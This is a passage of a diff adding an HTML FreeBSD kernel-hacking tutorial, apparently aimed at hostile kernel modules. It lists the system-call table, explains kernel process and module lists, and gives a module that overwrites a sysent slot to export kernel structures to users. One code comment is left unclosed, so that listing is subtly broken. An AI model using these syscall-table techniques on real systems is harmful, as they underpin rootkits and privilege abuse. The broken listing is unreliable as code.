+	{ 4, (sy_call_t *)ftruncate },			/* 201 = ftruncate */
+	{ 6, (sy_call_t *)__sysctl },			/* 202 = __sysctl */
+	{ 2, (sy_call_t *)mlock },			/* 203 = mlock */
+	{ 2, (sy_call_t *)munlock },			/* 204 = munlock */
+	{ 1, (sy_call_t *)undelete },			/* 205 = undelete */
+	{ 2, (sy_call_t *)futimes },			/* 206 = futimes */
+	{ 1, (sy_call_t *)getpgid },			/* 207 = getpgid */
+	{ 0, (sy_call_t *)nosys },			/* 208 = newreboot */
+	{ 3, (sy_call_t *)poll },			/* 209 = poll */
+	{ 0, (sy_call_t *)lkmnosys },			/* 210 = lkmnosys */
+	{ 0, (sy_call_t *)lkmnosys },			/* 211 = lkmnosys */
+	{ 0, (sy_call_t *)lkmnosys },			/* 212 = lkmnosys */
+	{ 0, (sy_call_t *)lkmnosys },			/* 213 = lkmnosys */
+	{ 0, (sy_call_t *)lkmnosys },			/* 214 = lkmnosys */
+	{ 0, (sy_call_t *)lkmnosys },			/* 215 = lkmnosys */
+	{ 0, (sy_call_t *)lkmnosys },			/* 216 = lkmnosys */
+	{ 0, (sy_call_t *)lkmnosys },			/* 217 = lkmnosys */
+	{ 0, (sy_call_t *)lkmnosys },			/* 218 = lkmnosys */
+	{ 0, (sy_call_t *)lkmnosys },			/* 219 = lkmnosys */
+	{ 4, (sy_call_t *)__semctl },			/* 220 = __semctl */
+	{ 3, (sy_call_t *)semget },			/* 221 = semget */
+	{ 3, (sy_call_t *)semop },			/* 222 = semop */
+	{ 1, (sy_call_t *)semconfig },			/* 223 = semconfig */
+	{ 3, (sy_call_t *)msgctl },			/* 224 = msgctl */
+	{ 2, (sy_call_t *)msgget },			/* 225 = msgget */
+	{ 4, (sy_call_t *)msgsnd },			/* 226 = msgsnd */
+	{ 5, (sy_call_t *)msgrcv },			/* 227 = msgrcv */
+	{ 3, (sy_call_t *)shmat },			/* 228 = shmat */
+	{ 3, (sy_call_t *)shmctl },			/* 229 = shmctl */
+	{ 1, (sy_call_t *)shmdt },			/* 230 = shmdt */
+	{ 3, (sy_call_t *)shmget },			/* 231 = shmget */
+	{ 2, (sy_call_t *)clock_gettime },		/* 232 = clock_gettime */
+	{ 2, (sy_call_t *)clock_settime },		/* 233 = clock_settime */
+	{ 2, (sy_call_t *)clock_getres },		/* 234 = clock_getres */
+	{ 0, (sy_call_t *)nosys },			/* 235 = timer_create */
+	{ 0, (sy_call_t *)nosys },			/* 236 = timer_delete */
+	{ 0, (sy_call_t *)nosys },			/* 237 = timer_settime */
+	{ 0, (sy_call_t *)nosys },			/* 238 = timer_gettime */
+	{ 0, (sy_call_t *)nosys },			/* 239 = timer_getoverrun */
+	{ 2, (sy_call_t *)nanosleep },			/* 240 = nanosleep */
+	{ 0, (sy_call_t *)nosys },			/* 241 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 242 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 243 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 244 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 245 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 246 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 247 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 248 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 249 = nosys */
+	{ 3, (sy_call_t *)minherit },			/* 250 = minherit */
+	{ 1, (sy_call_t *)rfork },			/* 251 = rfork */
+	{ 3, (sy_call_t *)openbsd_poll },		/* 252 = openbsd_poll */
+	{ 0, (sy_call_t *)issetugid },			/* 253 = issetugid */
+	{ 3, (sy_call_t *)lchown },			/* 254 = lchown */
+	{ 0, (sy_call_t *)nosys },			/* 255 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 256 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 257 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 258 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 259 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 260 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 261 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 262 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 263 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 264 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 265 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 266 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 267 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 268 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 269 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 270 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 271 = nosys */
+	{ 3, (sy_call_t *)getdents },			/* 272 = getdents */
+	{ 0, (sy_call_t *)nosys },			/* 273 = nosys */
+	{ 2, (sy_call_t *)lchmod },			/* 274 = lchmod */
+	{ 3, (sy_call_t *)lchown },			/* 275 = netbsd_lchown */
+	{ 2, (sy_call_t *)lutimes },			/* 276 = lutimes */
+	{ 3, (sy_call_t *)msync },			/* 277 = netbsd_msync */
+	{ 2, (sy_call_t *)nstat },			/* 278 = nstat */
+	{ 2, (sy_call_t *)nfstat },			/* 279 = nfstat */
+	{ 2, (sy_call_t *)nlstat },			/* 280 = nlstat */
+	{ 0, (sy_call_t *)nosys },			/* 281 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 282 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 283 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 284 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 285 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 286 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 287 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 288 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 289 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 290 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 291 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 292 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 293 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 294 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 295 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 296 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 297 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 298 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 299 = nosys */
+	{ 1, (sy_call_t *)modnext },			/* 300 = modnext */
+	{ 2, (sy_call_t *)modstat },			/* 301 = modstat */
+	{ 1, (sy_call_t *)modfnext },			/* 302 = modfnext */
+	{ 1, (sy_call_t *)modfind },			/* 303 = modfind */
+	{ 1, (sy_call_t *)kldload },			/* 304 = kldload */
+	{ 1, (sy_call_t *)kldunload },			/* 305 = kldunload */
+	{ 1, (sy_call_t *)kldfind },			/* 306 = kldfind */
+	{ 1, (sy_call_t *)kldnext },			/* 307 = kldnext */
+	{ 2, (sy_call_t *)kldstat },			/* 308 = kldstat */
+	{ 1, (sy_call_t *)kldfirstmod },		/* 309 = kldfirstmod */
+	{ 1, (sy_call_t *)getsid },			/* 310 = getsid */
+	{ 0, (sy_call_t *)nosys },			/* 311 = setresuid */
+	{ 0, (sy_call_t *)nosys },			/* 312 = setresgid */
+	{ 0, (sy_call_t *)nosys },			/* 313 = obsolete signanosleep */
+	{ 1, (sy_call_t *)aio_return },			/* 314 = aio_return */
+	{ 3, (sy_call_t *)aio_suspend },		/* 315 = aio_suspend */
+	{ 2, (sy_call_t *)aio_cancel },			/* 316 = aio_cancel */
+	{ 1, (sy_call_t *)aio_error },			/* 317 = aio_error */
+	{ 1, (sy_call_t *)aio_read },			/* 318 = aio_read */
+	{ 1, (sy_call_t *)aio_write },			/* 319 = aio_write */
+	{ 4, (sy_call_t *)lio_listio },			/* 320 = lio_listio */
+	{ 0, (sy_call_t *)yield },			/* 321 = yield */
+	{ 1, (sy_call_t *)thr_sleep },			/* 322 = thr_sleep */
+	{ 1, (sy_call_t *)thr_wakeup },			/* 323 = thr_wakeup */
+	{ 1, (sy_call_t *)mlockall },			/* 324 = mlockall */
+	{ 0, (sy_call_t *)munlockall },			/* 325 = munlockall */
+	{ 2, (sy_call_t *)__getcwd },			/* 326 = __getcwd */
+	{ 2, (sy_call_t *)sched_setparam },		/* 327 = sched_setparam */
+	{ 2, (sy_call_t *)sched_getparam },		/* 328 = sched_getparam */
+	{ 3, (sy_call_t *)sched_setscheduler },		/* 329 = sched_setscheduler */
+	{ 1, (sy_call_t *)sched_getscheduler },		/* 330 = sched_getscheduler */
+	{ 0, (sy_call_t *)sched_yield },		/* 331 = sched_yield */
+	{ 1, (sy_call_t *)sched_get_priority_max },		/* 332 = sched_get_priority_max */
+	{ 1, (sy_call_t *)sched_get_priority_min },		/* 333 = sched_get_priority_min */
+	{ 2, (sy_call_t *)sched_rr_get_interval },		/* 334 = sched_rr_get_interval */
+	{ 2, (sy_call_t *)utrace },			/* 335 = utrace */
+	{ 8, (sy_call_t *)sendfile },			/* 336 = sendfile */
+	{ 3, (sy_call_t *)kldsym },			/* 337 = kldsym */
+};
+</xmp>
+As you can see sysent[] contains one sysent structure for every system call
+installed on the system. Recall that the first element in the sysent structure
+is the argument count and the second the function pointer. This means for the
+kldsysm system call :
+<xmp>
+argument cound        : 3
+system call function  : kldsysm
+</xmp>
+And this means that we can get the sysent entry of every system call we want by
+reading sysent[system call number]. The easiest way to get the index is to use
+the syscalls.h file.
+
+<p>
+<H3><A NAME="I.6.1."></A>6.1 Important system calls for hacking</h3>
+<p>
+Now I want to extract the most important system calls you have to understand in
+order to do a bit of kernel hacking. I give you the system call number, the
+function and their arguments structure. Maybe you need to hack other
+system calls, its just a matter of creativity.
+
+
+
+<TABLE border=5 width=100%>
+<tr>
+
+<th>system call</th>
+<th>number</th>
+<th>argument struct</th>
+
+
+<tr>
+<td>read(p, uap)</td>
+<td>3</td>
+<td>struct read_args {<br>
+int fd;<br>
+void *buf;<br>
+size_t nbyte; }<br></td>
+</tr>
+
+
+<tr>
+<td>write(p, uap)</td>
+<td>4</td>
+<td>struct write_args {<br>
+int fd;<br>
+const void *buf;<br>
+size_t nbyte; }<br></td>
+</tr>
+
+<tr>
+<td>open(p, uap)</td>
+<td>5</td>
+<td>struct open_args {<br>
+char *path;<br>
+int flags;<br>
+int mode; }<br></td>
+</tr>
+
+<tr>
+<td>link(p, uap)</td>
+<td>9</td>
+<td>struct link_args {<br>
+char *path;<br>
+char *link; }<br></td>
+</tr>
+
+<tr>
+<td>recvfrom(p, uap)</td>
+<td>29</td>
+<td>struct recvfrom_args {<br>
+int s;<br>
+caddr_t buf;<br>
+size_t len;<br>
+int flags;<br>
+caddr_t from;<br>
+int *fromlenaddr; }<br>
+</td>
+</tr>
+
+<tr>
+<td>accept(p, uap)</td>
+<td>30</td>
+<td>struct accept_args {<br>
+int s;<br>
+caddr_t name;<br>
+int *anamelen; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>kill(p, uap)</td>
+<td>37</td>
+<td>struct kill_args {<br>
+int pid;<br>
+int signum; }<br>
+</td>
+</tr>
+
+<tr>
+<td>ktrace(p, uap)</td>
+<td>45</td>
+<td>struct ktrace_args {<br>
+char *fname;<br>
+int ops;<br>
+int facs;<br>
+int pid; }<br>
+</td>
+</tr>
+
+<tr>
+<td>ioctl(p, uap)</td>
+<td>54</td>
+<td>struct ioctl_args {<br>
+int fd_;<br>
+u_long com;<br>
+caddr_t data; }<br>
+</td>
+</tr>
+
+
+
+<tr>
+<td>reboot(p, uap)</td>
+<td>55</td>
+<td>struct reboot_args {<br>
+int opt; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>execve(p, uap)</td>
+<td>59</td>
+<td>struct execve_args {<br>
+char *fname;<br>
+char **argv;<br>
+char **envv; }<br>
+</td>
+</tr>
+
+
+
+<tr>
+<td>sbrk(p, uap)</td>
+<td>69</td>
+<td>struct sbrk_args {<br>
+int incr; }<br>
+</td>
+</tr>
+
+
+
+
+<tr>
+<td>socket(p, uap)</td>
+<td>97</td>
+<td>struct socket_args {<br>
+int domain;<br>
+int type;<br>
+int protocol; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>connect(p, uap)</td>
+<td>98</td>
+<td>struct connect_args {<br>
+int s;<br>
+caddr_t name;<br>
+int namelen; }<br>
+</td>
+</tr>
+
+
+
+<tr>
+<td>bind(p, uap)</td>
+<td>104</td>
+<td>struct bind_args {<br>
+int s;<br>
+caddr_t name;<br>
+int namelen; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>listen(p, uap)</td>
+<td>106</td>
+<td>struct listen_args {<br>
+int s;<br>
+int backlog; }<br>
+</td>
+</tr>
+
+<tr>
+<td>readv(p, uap)</td>
+<td>120</td>
+<td>struct readv_args {<br>
+int fd;<br>
+struct iovec *iovp;<br>
+u_int iovcnt; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>writev(p, uap)</td>
+<td>121</td>
+<td>struct writev_args {<br>
+int fd;<br>
+struct iovec *iovp;<br>
+u_int iovcnt; }<br>
+</td>
+</tr>
+
+<tr>
+<td>rename(p, uap)</td>
+<td>128</td>
+<td>struct rename_args {<br>
+char *from;<br>
+char *to; }<br>
+</td>
+</tr>
+
+<tr>
+<td>sendto(p, uap)</td>
+<td>133</td>
+<td>struct sendto_args {<br>
+int s;<br>
+caddr_t buf;<br>
+size_t len;<br>
+int flags;<br>
+caddr_t to;<br>
+int tolen; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>mkdir(p, uap)</td>
+<td>136</td>
+<td>struct mkdir_args {<br>
+char *path;<br>
+int mode; }<br>
+</td>
+</tr>
+
+<tr>
+<td>rmdir(p, uap)</td>
+<td>137</td>
+<td>struct rmdir_args {<br>
+char *path; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>getdirentries(p, uap)</td>
+<td>196</td>
+<td>struct getdirentries_args {<br>
+int fd;<br>
+char *buf;<br>
+u_int count;<br>
+long *basep; }<br>
+</td>
+</tr>
+
+<tr>
+<td>modnext(p, uap)</td>
+<td>300</td>
+<td>struct modnext_args {<br>
+int modid; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>modstat(p, uap)</td>
+<td>301</td>
+<td>struct modstat_args {<br>
+int modid; <br>
+struct module_stat *stat; }<br>
+</td>
+</tr>
+
+
+
+<tr>
+<td>modfnext(p, uap)</td>
+<td>302</td>
+<td>struct modfnext_args {<br>
+int modid; }<br>
+</td>
+</tr>
+
+<tr>
+<td>modfind(p, uap)</td>
+<td>303</td>
+<td>struct modfind_args {<br>
+char *name; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>kldload(p, uap)</td>
+<td>304</td>
+<td>struct kldload_args {<br>
+const char *file; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>kldunload(p, uap)</td>
+<td>305</td>
+<td>struct kldunload_args {<br>
+int fileid; }<br>
+</td>
+</tr>
+
+<tr>
+<td>kldfind(p, uap)</td>
+<td>306</td>
+<td>struct kldfind_args {<br>
+const char *file; }<br>
+</td>
+</tr>
+
+
+<tr>
+<td>kldnext(p, uap)</td>
+<td>307</td>
+<td>struct kldnext_args {<br>
+int fileid; }<br>
+</td>
+</tr>
+
+
+
+<tr>
+<td>kldstat(p, uap)</td>
+<td>308</td>
+<td>struct kldstat_args {<br>
+int fileid;<br>
+struct kld_file_stat *stat; }<br>
+</td>
+</tr>
+
+
+
+<tr>
+<td>kldsym(p, uap)</td>
+<td>337</td>
+<td>struct kldsym_args {<br>
+int fileid;<br>
+int cmd;<br>
+void *data; }<br>
+</td>
+</tr>
+
+</tr>
+</table>
+
+
+
+As you can see every system call gets the proc structure (standing for the
+process calling the system call) and a special argument structure.
+
+<p>
+<H3><A NAME="I.7."></A>7. Important Kernel structures / lists</h3>
+<p>
+
+Beside system calls kernel structures and lists are one of the most important
+things we have to deal with. This section will explain the most basic kernel
+structures and lists we need to understand. It is impossible to give you a
+complete list of all interesting kernel lists, of course.<br>
+This text is dealing with inserting hostile modules into the kernel. Those
+modules are wrapped by link files. The kernel inserts any link file loaded in
+a global list of linker_file structures. So let's take a look at this
+structure :
+<xmp>
+struct linker_file {
+    int			refs;		/* reference count */
+    int			userrefs;	/* kldload(2) count */
+    TAILQ_ENTRY(linker_file) link;	/* list of all loaded files */
+    char*		filename;	/* file which was loaded */
+    int			id;		/* unique id */
+    caddr_t		address;	/* load address */
+    size_t		size;		/* size of file */
+    int			ndeps;		/* number of dependancies */
+    linker_file_t*	deps;		/* list of dependancies */
+    STAILQ_HEAD(, common_symbol) common; /* list of common symbols */
+    TAILQ_HEAD(, module) modules;	/* modules in this file */
+    void*		priv;		/* implementation data */
+    struct linker_file_ops* ops;
+};  
+</xmp>
+Take a look at it. The general layout should be clear : link is used for the
+list management, filename is the name of the link file, modules stands for
+the modules in that file. This is the structure, but where is the global list
+holding all these entries? Take a look at the following line that can be
+found in kern_linker.c :
+<xmp>
+static linker_file_list_t files;
+</xmp>
+Unexpirienced kernel coders will ask what linker_file_list_t stands for (we
+thought of something like linker_file). Ok so let's look what
+linker_file_list_t stands for :
+<xmp>
+typedef TAILQ_HEAD(, linker_file) linker_file_list_t;
+</xmp>
+TAILQ_HEAD is one of lots of macros defined in queue.h. This include file
+provides lots o very helpful macros helping the kernel to manage a lot of
+internal lists. Let's say that the line above does something like
+initialization of the linker_file list, which can now be accessed via
+linker_file_list_t ('TheSeeker' will show how to use those macros). 
+Ok now we know where the linker_file list is located this should be enough for 
+the moment.<br>
+Now what about modules. As I said before modules are described by a module
+structure (see above). Those structures are also organized in a global list.
+So where and how is this list defined, take a look at this line from
+kern_module.c :
+<xmp>
+typedef TAILQ_HEAD(, module) modulelist_t;
+</xmp>
+Again we see TAILQ_HEAD providing us with a list and again we now know that
+modulelist_t is the global list for every module loaded.<br>
+One of the most important none-module related list in the kernel is the
+allproc (zombproc) list. The allproc list holds every process on the system
+except the zombie processes those are hold by zombproc. First let's take a
+look at the general structure of a process entry. The proc structure holds
+every piece of information needed :
+<xmp>
+struct	proc {
+	TAILQ_ENTRY(proc) p_procq;	/* run/sleep queue. */
+	LIST_ENTRY(proc) p_list;	/* List of all processes. */
+
+	/* substructures: */
+	struct	pcred *p_cred;		/* Process owner's identity. */
+	struct	filedesc *p_fd;		/* Ptr to open files structure. */
+	struct	pstats *p_stats;	/* Accounting/statistics (PROC ONLY). */
+	struct	plimit *p_limit;	/* Process limits. */
+	struct	vm_object *p_upages_obj;/* Upages object */
+	struct	procsig *p_procsig;
+#define p_sigacts	p_procsig->ps_sigacts
+#define p_sigignore	p_procsig->ps_sigignore
+#define p_sigcatch	p_procsig->ps_sigcatch
+
+#define	p_ucred		p_cred->pc_ucred
+#define	p_rlimit	p_limit->pl_rlimit
+
+	int	p_flag;			/* P_* flags. */
+	char	p_stat;			/* S* process status. */
+	char	p_pad1[3];
+
+	pid_t	p_pid;			/* Process identifier. */
+	LIST_ENTRY(proc) p_hash;	/* Hash chain. */
+	LIST_ENTRY(proc) p_pglist;	/* List of processes in pgrp. */
+	struct	proc *p_pptr;	 	/* Pointer to parent process. */
+	LIST_ENTRY(proc) p_sibling;	/* List of sibling processes. */
+	LIST_HEAD(, proc) p_children;	/* Pointer to list of children. */
+
+	struct callout_handle p_ithandle; /*
+					      * Callout handle for scheduling
+					      * p_realtimer.
+					      */
+/* The following fields are all zeroed upon creation in fork. */
+#define	p_startzero	p_oppid
+
+	pid_t	p_oppid;	 /* Save parent pid during ptrace. XXX */
+	int	p_dupfd;	 /* Sideways return value from fdopen. XXX */
+
+	struct	vmspace *p_vmspace;	/* Address space. */
+
+	/* scheduling */
+	u_int	p_estcpu;	 /* Time averaged value of p_cpticks. */
+	int	p_cpticks;	 /* Ticks of cpu time. */
+	fixpt_t	p_pctcpu;	 /* %cpu for this process during p_swtime */
+	void	*p_wchan;	 /* Sleep address. */
+	const char *p_wmesg;	 /* Reason for sleep. */
+	u_int	p_swtime;	 /* Time swapped in or out. */
+	u_int	p_slptime;	 /* Time since last blocked. */
+
+	struct	itimerval p_realtimer;	/* Alarm timer. */
+	u_int64_t	p_runtime;	/* Real time in microsec. */
+	struct	timeval p_switchtime;	/* When last scheduled */
+	u_quad_t p_uticks;		/* Statclock hits in user mode. */
+	u_quad_t p_sticks;		/* Statclock hits in system mode. */
+	u_quad_t p_iticks;		/* Statclock hits processing intr. */
+
+	int	p_traceflag;		/* Kernel trace points. */
+	struct	vnode *p_tracep;	/* Trace to vnode. */
+
+	int	p_siglist;		/* Signals arrived but not delivered. */
+
+	struct	vnode *p_textvp;	/* Vnode of executable. */
+
+	char	p_lock;			/* Process lock (prevent swap) count. */
+	char	p_oncpu;		/* Which cpu we are on */
+	char	p_lastcpu;		/* Last cpu we were on */
+	char	p_pad2;			/* alignment */
+
+	short	p_locks;		/* DEBUG: lockmgr count of held locks */
+	short	p_simple_locks;		/* DEBUG: count of held simple locks */
+	unsigned int	p_stops;	/* procfs event bitmask */
+	unsigned int	p_stype;	/* procfs stop event type */
+	char	p_step;			/* procfs stop *once* flag */
+	unsigned char	p_pfsflags;	/* procfs flags */
+	char	p_pad3[2];		/* padding for alignment */
+	register_t p_retval[2];		/* syscall aux returns */
+	struct	sigiolst p_sigiolst;	/* list of sigio sources */
+	int	p_sigparent;		/* signal to parent on exit */
+	sigset_t p_oldsigmask;		/* saved mask from before sigpause */
+	int	p_sig;			/* for core dump/debugger XXX */
+        u_long	p_code;	  	        /* for core dump/debugger XXX */
+
+/* End area that is zeroed on creation. */
+#define	p_endzero	p_startcopy
+
+/* The following fields are all copied upon creation in fork. */
+#define	p_startcopy	p_sigmask
+
+	sigset_t p_sigmask;	/* Current signal mask. */
+	u_char	p_priority;	/* Process priority. */
+	u_char	p_usrpri;	/* User-priority based on p_cpu and p_nice. */
+	char	p_nice;		/* Process "nice" value. */
+	char	p_comm[MAXCOMLEN+1];
+
+	struct 	pgrp *p_pgrp;	/* Pointer to process group. */
+
+	struct 	sysentvec *p_sysent; /* System call dispatch information. */
+
+	struct	rtprio p_rtprio;	/* Realtime priority. */
+/* End area that is copied on creation. */
+#define	p_endcopy	p_addr
+	struct	user *p_addr;	/* Kernel virtual addr of u-area (PROC ONLY). */
+	struct	mdproc p_md;	/* Any machine-dependent fields. */
+
+	u_short	p_xstat;	/* Exit status for wait; also stop signal. */
+	u_short	p_acflag;	/* Accounting flags. */
+	struct	rusage *p_ru;	/* Exit information. XXX */
+
+	int	p_nthreads;	/* number of threads (only in leader) */
+	void	*p_aioinfo;	/* ASYNC I/O info */
+	int	p_wakeup;	/* thread id */
+	struct proc *p_peers;	
+	struct proc *p_leader;
+	struct	pasleep p_asleep;	/* Used by asleep()/await(). */
+};
+</xmp> 
+This structure is quite big and complex. There are lots of substructurs we will
+use in part II, so I won't explain them here. Most of the fields should be
+clear. The vmspace field is also very important for us, because it's our gate
+to the process' memory.<br>
+Now we know how processes are described, but where do we have the allproc and
+zombroc lists ? Let's search for them in kern_proc.c :
+<xmp>
+struct proclist allproc;
+struct proclist zombroc;
+</xmp>
+A reference to proclist can be found in proc.h
+<xmp>
+LIST_HEAD(proclist, proc);
+</xmp>
+LIST_HEAD is another macro taken from queue.h that provides a list (here
+proclist). Now we know how to find any process running on the system : just
+look through allproc (zombroc).<br>
+This are the most basic lists and structures we need to understand, there are
+thousands more, but we won't need them too often.
+
+<p>
+<H3><A NAME="I.7.1."></A>7.1.1. TheSeeker - or how to access kernel lists</h3>
+<p>
+
+I developed a little module that inserts one new system call which provides
+us with the ability to export some kernel space structures and lists to user
+space. This is not very useful (there are better libc calls), I just wrote it
+to show you in an easy way how to handle system calls, kernel lists, user space
+kernel space interfaces, etc. There are some pieces of code that handle the
+user space <-> kernel space transition. For those not aware of this problem I
+suggest first reading section I.8. Those who read my Linux article should be
+able to continue without problems. So here is the module source :
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+#include <sys/file.h>
+#include <sys/malloc.h>
+#include <sys/types.h>
+#include <sys/lock.h>
+
+#define GD_ALLPROC       1
+#define GD_LINKFILES     2
+#define GD_MODULES       3
+
+typedef TAILQ_HEAD(, module) modulelist_t;
+
+/*import lock structure*/
+extern struct lock lock;
+
+/*import the linker_file list*/
+extern linker_file_list_t files;
+
+/*import module list*/
+extern modulelist_t modules;
+
+/*the module structure (normally defined in kern_module.c)*/
+struct module {
+ TAILQ_ENTRY(module) link;
+ TAILQ_ENTRY(module) flink;
+ struct linker_file *file;
+ int refs;
+ int id;
+ char *name;
+ modeventhand_t handler;
+ void *arg;
+ modspecific_t data;
+};
+
+/*structure for our getdata system call*/
+
+static struct getdata_args {
+ /*this int value stands for the data the user wants to see*/
+ int what;
+ /*this is a user space buffer where we will put the data*/
+ char *buffer;
+};
+
+
+/*the system call function we implement*/
+/*GENERAL WORKING :
+  This system call gets two arguments from a user space program : an integer
+  used as a switch parameter (what kernel list do we want) and a pointer to
+  an allocated user space memory location. If this pointer is zero the
+  system call will return the size of the requested list. This is useful for
+  selecting the buffer size in a second step.*/
+
+static 
+int getdata(struct proc *p, struct getdata_args *uap)
+{
+ int size, flag=0;
+ struct proc *pr;
+ linker_file_t lf=0;
+ module_t mod=0;
+
+ /*if the buffer is NULL then the user requests the list size*/
+ if (uap->buffer==NULL) flag=1;
+
+ /*which list does the user want*/
+ switch(uap->what) 
+ {
+  case GD_ALLPROC :
+  {
+   size=0;
+   pr=allproc.lh_first;
+   for (; pr!=0; pr=pr->p_list.le_next)
+   {
+    size+=sizeof(struct proc);
+   }
+   /*if the user only want the size, return it*/
+   if (flag==1) {p->p_retval[0]=size; break;}
+   pr=allproc.lh_first;
+   size=0;
+   /*otherwise returnthe structure into the user space buffer*7
+   for(; pr!=0; pr=pr->p_list.le_next)
+   {
+    copyout(pr, uap->buffer+size, sizeof(struct proc));
+    size+=sizeof(struct proc);
+   }
+   /*return number of procs returned in buffer*/
+   p->p_retval[0]=size/sizeof(struct proc);
+   break;
+  }
+  case GD_MODULES :
+  {
+   size=0;
+   for (mod=TAILQ_FIRST(&modules); mod; mod=TAILQ_NEXT(mod, link))
+   {  
+    size+=sizeof(struct module);
+   } 
+   if (flag==1) {p->p_retval[0]=size; break;}
+   size=0;
+   for (mod=TAILQ_FIRST(&modules); mod; mod=TAILQ_NEXT(mod, link))
+   {
+    copyout(mod, uap->buffer+size, sizeof(struct module));
+    size+=sizeof(struct module);
+   }
+   /*return number of procs returned in buffer*/
+   p->p_retval[0]=size/sizeof(struct module);
+   break;
+  }
+  case GD_LINKFILES :
+  {
+   size=0;
+   /*lock*/
+   lockmgr(&lock, LK_SHARED, 0, curproc);
+   for (lf=TAILQ_FIRST(&files); lf; lf=TAILQ_NEXT(lf, link))
+   {  
+    size+=sizeof(struct linker_file);
+   } 
+   /*unlock*/
+   lockmgr(&lock, LK_RELEASE, 0, curproc);
+   if (flag==1) {p->p_retval[0]=size; break;}
+   size=0;
+   lockmgr(&lock, LK_SHARED, 0, curproc);
+   for (lf=TAILQ_FIRST(&files); lf; lf=TAILQ_NEXT(lf, link))
+   {
+    copyout(lf, uap->buffer+size, sizeof(struct linker_file));
+    size+=sizeof(struct linker_file);
+   }
+   lockmgr(&lock, LK_RELEASE, 0, curproc);
+   /*return number of procs returned in buffer*/
+   p->p_retval[0]=size/sizeof(struct linker_file);
+   break;
+  }
+ }
+ return 0;
+}     
+        
+
+/*the hacked open syscall*/
+static struct sysent getdata_sysent = {
+       2,	
+       getdata			/* sy_call */
+};
+                                                                      
+                                                                              
+
+/*
+ * The function called at load/unload.
+ */
+static int
+dummy_handler (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+ switch (cmd) {
+  case MOD_LOAD :
+   /*install the system call, UNLOAD will not remove it, I am too lazy :)*/
+   sysent[210]=getdata_sysent;
+  break;
+  case MOD_UNLOAD :
+  break;
+  default :
+   error = EINVAL;
+  break;
+ }
+ return error;
+}
+                                                   
+/*install the module as our MISC type*/
+static moduledata_t syscall_mod = {
+ "TheSeeker", 
+ dummy_handler,
+ NULL
+};
+
+DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
+  
+</xmp>
+This is no nice style programming style, but working. The copy* functions will
+be explained in I.8. Recognize that return values for user space a saved in
+a part of the module structure (p->p_retval[0]). The rest should be quite
+clear.<br>
+I also wrote a little user space program showing how to use this system call.
+Of course, you have to load the module before.
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+#include <sys/file.h>
+#include <sys/malloc.h>
+#include <sys/types.h>
+#include <sys/lock.h>
+
+
+typedef struct linker_file* linker_file_t;
+
+struct linker_file {
+    int			refs;		/* reference count */
+    int			userrefs;	/* kldload(2) count */
+    TAILQ_ENTRY(linker_file) link;	/* list of all loaded files */
+    char*		filename;	/* file which was loaded */
+    int			id;		/* unique id */
+    caddr_t		address;	/* load address */
+    size_t		size;		/* size of file */
+    int			ndeps;		/* number of dependancies */
+    linker_file_t*	deps;		/* list of dependancies */
+    STAILQ_HEAD(, common_symbol) common; /* list of common symbols */
